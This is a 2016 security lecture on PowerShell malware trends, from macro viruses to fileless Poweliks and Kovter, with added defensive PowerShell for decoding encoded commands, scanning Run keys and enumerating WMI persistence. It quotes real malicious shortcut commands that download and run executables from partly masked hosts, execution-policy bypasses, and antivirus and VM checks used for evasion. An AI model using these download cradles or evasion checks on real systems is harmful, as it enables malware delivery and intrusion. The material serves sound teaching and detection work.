PowerShell Malware Trends (2016-11-18, Cha Minseok, Digital Forensics Technical Lecture, public edition)
- 2. © AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
- Cha Minseok (車珉錫, CHA Minseok, Jacky Cha, mstoned7)
- 7 January 1988: started computing on an Apple ][+ clone
- 1989: infected by a Brain virus variant
- 1997: joined AhnLab
- Senior Malware Researcher, AhnLab
- Analyzes and researches malware on the analysis team of the AhnLab Security Emergency response Center (ASEC)
- Member of public-private joint investigation teams and the cyber security expert panel
- Member of vforum, AVED and AMTSO
- WildList reporter

:~$whoami
• Book
- Be Crazy About Security (보안에 미쳐라), 2016
* Source: http://www.yes24.com/24/goods/29333992

Before we begin
• "There is no perfectly secure system in this world"
- WarGames (1983), starring Matthew Broderick
* Source: WarGames (1983)

PowerShell
• PowerShell
- Scripting language and shell first released in 2006
- Available as a separate download for Windows XP and Vista; shipped in-box from Windows 7 onward
* Source: https://msdn.microsoft.com/en-us/powershell

Windows Management Instrumentation (WMI)
• WMI
- Microsoft's implementation of WBEM/CIM: a management layer that exposes system data (processes, services, hardware, registry, events) to scripts and tools, locally and remotely
* Source: https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx

Windows Management Instrumentation (WMI)
• WMI architecture
- Clients (PowerShell, wmic, scripts, remote DCOM/WinRM callers) talk to the WMI service, which dispatches requests to providers and the CIM repository
* Source: http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/

PowerShell + WMI
• Getting antivirus product information
- Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
- (root\SecurityCenter2 exists on client editions from Vista onward; it is absent on Windows Server)

PowerShell + WMI
• Checking for a virtual environment
- Get-WmiObject -Class Win32_ComputerSystem
- (Manufacturer and Model give the hypervisor away, e.g. "VMware, Inc." / "VMware Virtual Platform" or "innotek GmbH" / "VirtualBox")
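The two queries above wrapped into small reconnaissance functions, as an added example that is not code from the original slides. The namespace, classes and properties are real; the interpretation of productState (a bit field Microsoft does not document) and the manufacturer/model strings used to recognise a hypervisor are assumptions. The slides use Get-WmiObject; Get-CimInstance used here returns the same classes on Windows PowerShell 3.0+ and also works in PowerShell 7, where Get-WmiObject no longer exists.

```powershell
# Added example; not code from the original slides. Windows PowerShell 3.0 or later.

function Get-AntiVirusStatus {
    # root\SecurityCenter2 exists on client editions from Vista onward and is
    # absent on Windows Server, so "no namespace" means "unknown", not "no AV".
    $products = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
    foreach ($p in $products) {
        # productState is an undocumented bit field. The community reading
        # (assumption, verify against the vendors you care about): as a 6-digit
        # hex string, digits 3-4 are 10/11 when real-time protection is on and
        # digits 5-6 are 00 when signatures are up to date.
        $hex = '{0:X6}' -f [int]$p.productState
        [pscustomobject]@{
            Name     = $p.displayName
            Enabled  = ($hex.Substring(2, 2) -in '10', '11')
            UpToDate = ($hex.Substring(4, 2) -eq '00')
            Exe      = $p.pathToSignedProductExe
            State    = "0x$hex"
        }
    }
}

function Test-VirtualMachine {
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    # Manufacturer/Model strings typical of common hypervisors (assumption; extend as needed).
    $patterns = 'VMware', 'VirtualBox', 'innotek', 'QEMU', 'Xen', 'KVM', 'Parallels', 'Virtual Machine'
    $hit = @($patterns | Where-Object { "$($cs.Manufacturer) $($cs.Model)" -match $_ })
    [pscustomobject]@{
        Manufacturer      = $cs.Manufacturer
        Model             = $cs.Model
        # HypervisorPresent exists from Windows 8 / Server 2012 ($null before that);
        # it is also $true on a physical host that has Hyper-V or VBS enabled.
        HypervisorPresent = $cs.HypervisorPresent
        LooksVirtual      = ($hit.Count -gt 0) -or ($cs.HypervisorPresent -eq $true)
    }
}

Get-AntiVirusStatus | Format-Table -AutoSize
Test-VirtualMachine
```

Malware runs exactly these queries to decide whether to stay dormant (sandbox, analyst VM) or to pick a payload that the installed product does not detect; the same functions are useful on the defender's side for asset inventory.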

Timeline
(figure: a timeline with ticks at 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016 and 2017; the milestones plotted on it, with the years the following slides give them)
- 1995: Macro virus
- 2000: Loveletter
- 2004: Monad announced
- 2006: PowerShell released; PowerShell malware PoC
- 2013: PowerShell ransomware
- 2014: Poweliks; Phase
- 2015: fileless intrusions using WMI
- 2016: PowerShell + macro appears; flood of PowerShell downloaders
- Also plotted, without a year stated on the slides: improved batch virus, VBScript malware, Bedep, Kovter

1995 – Macro virus
• 1995–2001: the heyday of macro viruses

2000 – Loveletter
• 4 May 2000: LoveLetter virus
- Spread by email
- Social engineering: the mail subject "ILOVEYOU"
- Destroyed image and music files

2004 – Monad
• Concerns
- Monad, the prototype of PowerShell, developed in 2004
* Source: https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses

2006 – PowerShell malware PoC
• Proof-of-concept PowerShell malware
* Source: https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2

2006 – PowerShell released
• PowerShell released
* Source: http://www.symantec.com/connect/ru/blogs/powershell-released?page=1

2013 – PowerShell ransomware
• PowerShell ransomware appears
* Source: https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/

2014 – Poweliks
• Poweliks
- Stored inside the registry rather than as a file on disk
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

2014 – Phase
• Phase
- A variant of Solarbot, which was first found in 2013
* Source: http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/

2015 – WMI abuse
• Black Hat 2015
* Source: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

2015 – PowerShell malware starts to increase
• Growth of PowerShell malware
* Source: https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/

2016 – Macro + PowerShell
• Macro + PowerShell
* Source: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/

2016 – Malware using PowerShell becomes widespread
• Malware using PowerShell becomes widespread
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

Conditions for in-the-wild malware
(figure: three conditions)
- A large user base
- Gaps in the security framework
- Easy to create

Advantages of PowerShell malware
(figure: three advantages)
- Powerful functionality
- Easy to create
- Possibility of evading behaviour-based products

Main infection vectors
• Main infection vectors
Mail
- Attachment or link
Web browser
- Via exploit kits
- Also used for fileless infections

PowerShell execution
• Execution permission
- Tested a DownloadFile command both as a single command and as a script file
- The single command runs, but the script file is blocked by the execution policy
- (The execution policy only governs script files: text passed with -Command or typed at the prompt is never subject to it)

PowerShell execution
• Bypassing PowerShell execution policies
- The execution policy is a safety setting, not a security boundary: it can be bypassed without admin rights, e.g. powershell.exe -ExecutionPolicy Bypass, -EncodedCommand, piping script text into powershell.exe, or Set-ExecutionPolicy -Scope Process Bypass
* Source: https://technet.microsoft.com/en-us/library/ee176847.aspx
* Source: http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html

Functionality
• Downloader or dropper
- Fetches a payload from a URL and runs it (downloader), or writes an embedded payload to disk and runs it (dropper)
* Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/

Types
(figure: file types that carry PowerShell malware)
- Office documents (DOC, DOCM, XLS, XLSM)
- Shortcut (LNK)
- PowerShell script (PS1)
- Windows Script File (WSF), HTML Application (HTA)
- JavaScript / VBScript (JS, JSE, VBS, VBE, WSF, HTA)

JavaScript – JS
• JavaScript (JS)

Visual Basic Script
• VBScript (VBS)

Windows Script File (WSF)
• WSF (Windows Script File)
- Mostly JavaScript

Windows Script File (WSF)
• WSF (Windows Script File)

HTML Application (HTA)
• HTML Application (HTA)
- Mostly JavaScript

Office (DOC, DOCM, XLS, XLSM)
• Documents containing macros

Shortcut (LNK)
• Download
- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
- The shortcut target is powershell.exe; the argument string downloads a PE with WebClient.DownloadFile and launches it. Splitting 'tes'+'t3.e'+'xe' and calling Start-Process through a variable (&($cmd)) are simple attempts to defeat string signatures.

Shortcut (LNK)
• Download
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
- -ExecutionPolicy bypass, -noprofile and -windowstyle hidden are the usual trio: no policy check, no profile scripts, no visible console window.

Shortcut (LNK)
• Encoding
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
- -EncodedCommand takes the Base64 of the UTF-16LE script text; the visible prefix UABvAHc decodes to "Pow". Note that the 32-bit host under SysWOW64 is used on 64-bit Windows.
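An added example, not code from the original slides, that ties the execution-policy slides to the encoded shortcut above: it shows why the policy does not stop these shortcuts, and gives a triage helper that pulls the Base64 blob out of a powershell.exe command line and decodes it. The sample command line is constructed (example.invalid is a reserved, non-resolving name); the slide's own truncated blob is not reconstructed, only shown to fail decoding.

```powershell
# Added example; not code from the original slides. Windows PowerShell 3.0 or later.

# 1. Why the execution policy is no obstacle: it gates script files only. Text given
#    via -Command/-EncodedCommand or typed at the prompt is never checked, and the
#    policy can be overridden per process without admin rights.
function Show-ExecutionPolicyBypass {
    Get-ExecutionPolicy -List                                                          # all scopes, highest precedence first
    powershell.exe -NoProfile -ExecutionPolicy Bypass -Command 'Get-ExecutionPolicy'  # prints Bypass
    # A script file can also be fed through stdin, which the host treats as commands:
    #   Get-Content .\script.ps1 | powershell.exe -NoProfile -
}

# 2. -EncodedCommand is Base64 over the UTF-16LE bytes of the script text.
function ConvertTo-EncodedCommand([string]$Script) {
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}
function ConvertFrom-EncodedCommand([string]$Base64) {
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# 3. Triage helper: pull the blob out of a powershell.exe command line and decode it.
#    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
#    so the regex matches those; "-ex..." (ExecutionPolicy) is not matched.
function Get-DecodedCommandLine([string]$CommandLine) {
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)')
    if (-not $m.Success) { return $null }
    $b64 = $m.Groups[1].Value
    try { $decoded = ConvertFrom-EncodedCommand $b64 }
    catch { return [pscustomobject]@{ Encoded = $b64; Decoded = $null; Note = 'not valid Base64 (truncated?)' } }
    [pscustomobject]@{
        Encoded    = $b64
        Decoded    = $decoded
        # Crude indicator: does the decoded text do what the shortcut cradles above do?
        Suspicious = [bool]($decoded -match '(?i)DownloadFile|DownloadString|Invoke-Expression|\bIEX\b|Start-Process|-w(indowstyle)?\s+hidden')
    }
}

# Constructed sample (not the slide's real payload): the cradle from the second
# shortcut, encoded the way the third shortcut is. Nothing here is executed.
$cradle = '(New-Object Net.WebClient).DownloadFile("http://example.invalid/bg.exe", "C:\Users\Public\Example.exe")'
$sample = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoP -W Hidden -Enc ' + (ConvertTo-EncodedCommand $cradle)
Get-DecodedCommandLine $sample | Format-List                                     # Decoded shows the cradle, Suspicious is True
Get-DecodedCommandLine 'powershell.exe -EncodedCommand UABvAHc' | Format-List   # the slide's truncated blob: not decodable
```

The decode step is the one to automate in log review: Sysmon or Security event 4688 command lines that contain an encoded switch are unreadable until decoded, and the Base64 itself changes with every whitespace tweak, so signatures belong on the decoded text.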

PowerShell (PS1)
• PowerShell script files (PS1)

Fileless
• Used as a fileless technique
- Poweliks: an encoded script and payload are kept in registry values and launched from a Run key, so nothing has to exist as a file on disk
* Source: https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file

Fileless malware
• Kovter
- The Run entry cannot be read (in Regedit)
- Runs its script through mshta.exe
- The payload is stored as encoded data in the registry
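An added example, not code from the original slides and not Kovter's or Poweliks's own code, showing how the registry tricks on these slides look to a defender. It walks the Run keys through the .NET registry API rather than Regedit, so value names that Regedit cannot display are still listed, and flags values that launch a script host (mshta, rundll32 with javascript:, WSH, powershell with encoded input). The indicator patterns are assumptions; the sample entries at the end are constructed so the checks can be tried offline.

```powershell
# Added example; not code from the original slides and not Kovter's or Poweliks's code.
# Windows PowerShell 3.0 or later; HKCU needs no admin rights.

# What a Poweliks/Kovter-style loader line looks like (assumption: tune for your estate).
$LoaderPatterns = @(
    '(?i)\bmshta(\.exe)?\b',                              # HTA host running inline or registry-stored script
    '(?i)\brundll32(\.exe)?\b.*javascript:',              # rundll32 javascript:"\..\mshtml,RunHTMLApplication" trick
    '(?i)\b[wc]script(\.exe)?\b',                         # WSH hosts
    '(?i)\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s',
    '(?i)\bpowershell(\.exe)?\b.*(iex|invoke-expression|downloadstring|frombase64string)'
)

function Test-RunValue {
    param([string]$Name, [string]$Data)
    $reasons = @()
    # Regedit cannot open or display value names containing control characters
    # (e.g. a leading NUL); that is the usual reason a Run entry "cannot be read".
    # The .NET registry API returns such names without complaint.
    if ($Name -match '[\x00-\x1F]') { $reasons += 'non-printable characters in value name' }
    foreach ($p in $LoaderPatterns) {
        if ($Data -match $p) { $reasons += "matches $p" }
    }
    # A long Base64-looking run inside a startup command is a signal on its own.
    if ($Data -match '[A-Za-z0-9+/=]{200,}') { $reasons += 'long Base64-like blob' }
    $reasons
}

function Get-SuspiciousRunEntry {
    # 64-bit PowerShell sees the 64-bit view of HKLM; add the Wow6432Node paths if needed.
    $roots = @(
        @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'Software\Microsoft\Windows\CurrentVersion\Run' },
        @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'Software\Microsoft\Windows\CurrentVersion\RunOnce' },
        @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Microsoft\Windows\CurrentVersion\Run' },
        @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Microsoft\Windows\CurrentVersion\RunOnce' }
    )
    foreach ($r in $roots) {
        $key = $r.Hive.OpenSubKey($r.Path)
        if ($null -eq $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            # keep %APPDATA% and friends literal, exactly as they were written
            $data = [string]$key.GetValue($name, '', [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
            $why = @(Test-RunValue -Name $name -Data $data)
            if ($why.Count -gt 0) {
                [pscustomobject]@{
                    Key     = "$($r.Hive.Name)\$($r.Path)"
                    Name    = ($name -replace '[\x00-\x1F]', '?')     # printable form of the name
                    Data    = $data
                    Reasons = ($why -join '; ')
                }
            }
        }
        $key.Close()
    }
}

# Constructed sample entries (not real malware data) so the checks can be seen offline.
$samples = @{
    'OneDrive' = '"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'
    "`0hidden" = 'mshta javascript:eval(new ActiveXObject("WScript.Shell").RegRead("HKCU\\Software\\x\\y"))'
    'Updater'  = 'powershell.exe -nop -w hidden -enc ' + ('A' * 240)
}
foreach ($s in $samples.GetEnumerator()) {
    $why = @(Test-RunValue -Name $s.Key -Data $s.Value)
    '{0,-10} -> {1}' -f ($s.Key -replace '[\x00-\x1F]', '?'), $(if ($why.Count) { $why -join '; ' } else { 'clean' })
}
# On a live machine:  Get-SuspiciousRunEntry | Format-List
```

The constructed OneDrive entry comes back clean, the NUL-prefixed mshta entry is flagged for both the unreadable name and the script host, and the "Updater" entry for the encoded switch and the long blob. On a live system the interesting follow-up is the registry value the mshta script reads, which is where the encoded stage sits.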

Error
• "Windows PowerShell has stopped working"
- Windows PowerShell errors may suddenly appear on an infected machine

Response
• WMI for detection and response
- The same WMI that attackers use for fileless persistence can enumerate that persistence (root\subscription) and subscribe to process-creation events for script hosts
* Source: https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
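An added example, not code from the original slides or the ICS-CERT paper, of WMI on the defensive side. The first function lists the permanent event subscriptions in root\subscription, the mechanism from the Black Hat 2015 paper cited earlier, and flags consumers that run a command line or script; the second subscribes to process-creation events to catch the script hosts from the earlier slides as they start. Class names and cmdlets are real; the indicator patterns are assumptions. Reading root\subscription and Win32_ProcessStartTrace needs administrator rights.

```powershell
# Added example; not code from the original slides or the ICS-CERT paper.
# Windows PowerShell 3.0 or later, run as administrator.

function Get-WmiPersistence {
    # Permanent subscriptions live in root\subscription: a filter (WQL event query),
    # a consumer (what to do) and a binding that ties the two together.
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)   # returns every consumer subclass
    foreach ($b in @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)) {
        # Filter/Consumer are object references; take the Name key from the object or its string form
        $fname = if ($b.Filter.Name)   { $b.Filter.Name }   elseif ("$($b.Filter)"   -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] } else { '?' }
        $cname = if ($b.Consumer.Name) { $b.Consumer.Name } elseif ("$($b.Consumer)" -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] } else { '?' }
        $f = $filters   | Where-Object Name -eq $fname | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cname | Select-Object -First 1
        $action = switch ($c.CimClass.CimClassName) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }                       # runs a command line
            'ActiveScriptEventConsumer' { "$($c.ScriptingEngine): $($c.ScriptText)" }   # runs VBScript/JScript in-process
            default                     { "$($c.CimClass.CimClassName)" }
        }
        [pscustomobject]@{
            Filter     = $fname
            Query      = $f.Query
            Consumer   = $cname
            Action     = $action
            # Indicator patterns are an assumption; legitimate consumers rarely spawn script hosts
            Suspicious = [bool]($action -match '(?i)powershell|mshta|[wc]script|rundll32|\.hta\b|javascript|\biex\b|downloadstring|frombase64')
        }
    }
}

function Start-ScriptHostMonitor {
    # Win32_ProcessStartTrace fires for every new process. The event carries no command
    # line, so it is looked up from Win32_Process while the process is still alive
    # (assumption: short-lived one-liners may already be gone).
    $query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='powershell.exe' " +
             "OR ProcessName='mshta.exe' OR ProcessName='wscript.exe' OR ProcessName='cscript.exe'"
    Register-CimIndicationEvent -Query $query -SourceIdentifier 'ScriptHostStart' -Action {
        $e   = $Event.SourceEventArgs.NewEvent
        $cmd = (Get-CimInstance -ClassName Win32_Process -Filter "ProcessId=$($e.ProcessID)").CommandLine
        Write-Host ('[{0}] {1} pid={2} ppid={3} cmd={4}' -f (Get-Date -Format s), $e.ProcessName, $e.ProcessID, $e.ParentProcessID, $cmd)
    } | Out-Null
    # Stop with:  Unregister-Event -SourceIdentifier ScriptHostStart
}

Get-WmiPersistence | Format-List
# Start-ScriptHostMonitor     # leave running in the session; prints each script-host start
```

On a clean Windows install Get-WmiPersistence typically returns one binding (the built-in "SCM Event Log" filter and its NTEventLogEventConsumer); anything that runs powershell.exe or mshta.exe from a consumer deserves a look, since that is precisely the construction the Black Hat 2015 paper describes.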

Outlook
• Expansion of PowerShell
- PowerShell was open-sourced and ported to Linux and macOS in August 2016
* Source: https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2

Outlook
(figure: three expectations)
- Replacing JS and VBS?!
- Obfuscation
- Cross-platform

Wrap up
• Growth of malware using PowerShell
- Follows the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- First uses in targeted attacks observed
• Use of WMI
- Makes fileless malware possible
• Outlook
- PowerShell malware expected to grow alongside JS and VBS
- Possibility of multi-platform malware

Today's security problem
• Not really a fair fight
* source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png

Today's security problem
• Security is something everyone has to do together
* source: http://www.security-marathon.be/?p=1786

Q&A
email: minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7

References
• Ryan Kazanciyan & Matt Hastings, 'Investigating PowerShell Attacks', 2014
• Matt Graeber, 'Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor', 2015
• Santiago M. Pontiroli & F. Roberto Martinez, 'The Tao of .NET and PowerShell Malware Analysis', 2015
• Kim Seunghoon / AhnLab, 'Macro Downloader Analysis' (매크로 다운로더 분석), 2016